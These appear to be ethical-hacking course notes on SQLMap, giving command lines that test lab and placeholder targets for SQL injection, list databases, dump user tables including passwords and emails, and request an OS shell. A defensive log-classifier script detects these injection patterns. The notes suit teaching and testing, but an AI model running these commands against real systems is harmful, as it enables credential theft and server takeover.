# 4.3.6 SQLMap

## **SQLMap**

```bash
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

sqlmap -u "http://10.10.10.10/file.php?id=1" -p id          #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"      #POST Method
```

### **Get databases if injection exists**

```bash
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs    #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs    #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method

# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
# List tables in the bWAPP database
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
# List columns of the users table
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
# Dump the selected columns of the users table
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
```

### **Get Tables in a Database**

```bash
sqlmap -r login.req -D dbname --tables    #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables    #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables        #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method
```

### **Get data from a database table**

```bash
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump      #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump   #POST Method
```

### **Get OS-Shell**

```bash
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell
```

## **Example of usage**

### **Dumping emails from a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump
```

**Common parameters**

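* `-u`: The target URL to test.
* `-p`: The parameter you suspect is injectable; only this parameter is tested.
* `--dbms=mysql`: Forces the back-end DBMS to MySQL because you already know it, instead of letting sqlmap fingerprint it.
* `--level=5 --risk=3`: Enables deeper and riskier tests. Both are the maximum values; risk 3 adds OR-based payloads, which can change data if the injection point sits in an `UPDATE` or `DELETE` statement.
* `--technique=EUBT`: Restricts the SQLi techniques used to Error-based, Union-based, Boolean-based blind and Time-based blind.
* `-D ecommerce`: Targeting the `ecommerce` database.
* `-T users`: Looking into the `users` table.
* `-C email`: Only extracting the `email` column.
* `--dump`: Retrieves the data from the selected table and columns.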
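
From the defender's side, the four classes selected by `--technique=EUBT` leave recognizable payload shapes in web server access logs. The following is an added example (not part of the original notes) that classifies constructed log lines by technique letter; the signature regexes, the function names `classify` and `summarize`, and the sample lines are assumptions chosen for illustration, not an exhaustive ruleset.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Heuristic signatures per --technique letter (illustrative assumptions, not exhaustive).
SIGNATURES = {
    "E": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "U": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "B": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "T": re.compile(r"\b(SLEEP|PG_SLEEP|BENCHMARK)\s*\(|WAITFOR\s+DELAY", re.I),
}
TOOL_UA = re.compile(r"^sqlmap/", re.I)  # sqlmap's default User-Agent starts with "sqlmap/"
LOG_LINE = re.compile(  # combined log format: ip - - [ts] "METHOD uri PROTO" status size "ref" "ua"
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def classify(uri):
    """Return the technique letters whose signature matches the decoded URI."""
    decoded = unquote_plus(unquote_plus(uri))  # second pass catches double encoding
    return {letter for letter, rx in SIGNATURES.items() if rx.search(decoded)}

def summarize(lines):
    """Map client IP -> techniques seen, whether the tool UA appeared, and hit count."""
    report = defaultdict(lambda: {"techniques": set(), "tool_ua": False, "hits": 0})
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # not combined log format
        found, tool_ua = classify(m["uri"]), bool(TOOL_UA.match(m["ua"]))
        if found or tool_ua:  # the UA is client-controlled, so payloads count on their own
            entry = report[m["ip"]]
            entry["techniques"] |= found
            entry["tool_ua"] |= tool_ua
            entry["hits"] += 1
    return dict(report)

# Constructed sample lines (documentation address ranges, not real traffic).
TS = "[10/Oct/2024:13:55:36 +0000]"
SAMPLE = [
    f'203.0.113.7 - - {TS} "GET /file.php?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.0#stable (https://sqlmap.org)"',
    f'203.0.113.7 - - {TS} "GET /file.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 498 "-" "sqlmap/1.0#stable (https://sqlmap.org)"',
    f'198.51.100.23 - - {TS} "GET /file.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'198.51.100.23 - - {TS} "GET /file.php?id=1%20AND%20EXTRACTVALUE(1%2C1) HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    f'192.0.2.44 - - {TS} "GET /sqli_1.php?title=trade+union&action=search HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

A client that shows several technique letters within a short window is a stronger signal than any single match, since a benign search term can contain words such as "union".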

### **Listing columns of a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Dumping usernames**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump
```

### **Listing columns of the `users` table again (can be used for planning further dumps)**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Enumerating tables with a custom injection payload prefix/suffix**

```bash
# --prefix / --suffix set the strings placed before and after each injection payload;
# they do not filter table names.
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
```

[SQLMap](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/sqlmap)

